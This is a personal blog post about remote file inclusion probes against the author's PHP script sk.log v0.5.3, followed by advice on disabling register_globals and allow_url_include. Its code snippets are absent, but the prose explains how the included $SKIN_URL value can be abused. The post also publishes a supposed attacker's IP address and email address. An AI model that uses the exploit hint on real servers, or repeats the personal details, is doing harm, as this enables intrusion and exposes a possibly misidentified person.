v-s.net v0.6

Tuesday, 11:22 am in Geeking

I’m an obsessive IP tracker.  Literally everything on this domain tracks IPs.  The hits tracker tracks IPs.  sk.log tracks IPs.  Every Apache error page tracks IPs.  And every single generic mail-to form?  Yeah, they track IPs as well.

So I wake up this morning to find my inbox full of error notifications.  Someone’s been hitting my site hard with something.  Something that looks a bit like this:

And they’ve been looking everywhere for it.  For those who are curious, it’s a remote include vulnerability that effects sk.log v0.5.3 (the one I don’t recommend anyone uses) running on servers that don’t have register_globals turned off, and allow remote include by HTTP.  The vulnerable line is thus:

The problem is that it appears as the first line in a file.  If the file is called directly with $SKIN_URL as a query string, you’ve got a problem.  Well, so long as your register_globals is on, which is getting rarer and rarer nowadays.  In a nutshell, the vulnerability is called by a logic error, and could easily be fixed by adding a single include line above this that includes whichever file defines $SKIN_URL.  The error wouldn’t be evident unless you were calling log.inc.php directly; and had looked at the code, of course.

Now, sk.log v0.6 doesn’t suffer from this vulnerability; it uses the same sort of logic in several places, but the variable part of the include is returned from an object function call, which as far as I know can’t be compromised by query string data (well, not in this way).  But I’ve still learnt some important lessons this morning, notably:

• The logic error described above?  Yeah; easy to do.  Watch out for it.
• register_globals is still bad…
• …but allowing include() via HTTP is even worse.

Theoretically, the latter should be off by default in most PHP installs.  However, it might not be, in which case it is definitely in your interest to turn it off yourself.  The directive you’re after is allow_url_include.  Depending on how your server is configured, you may be able to override it with a custom php.ini file containing:

A .htaccess file:

Per-script:

Or none of the above (which sucks; email your host and complain).

Anyway, the actual point of this entry was to have a bit of a laugh at someone else’s expense.  Because, while I was clearing out the error notifications, I noticed that the vast majority of the fishing attempts came from a single IP address: 78.166.43.14.  The same IP address had helpfully filled out a download form for me, and even provided an email address: kezzap@hotmail.com.

Seriously, dude; if you’re going to try hacking someone’s site, how ‘bout next time you don’t give them your email, huh?

• Tags » php, security, sk.log, sk.ode
• Music » New Order, "True Faith"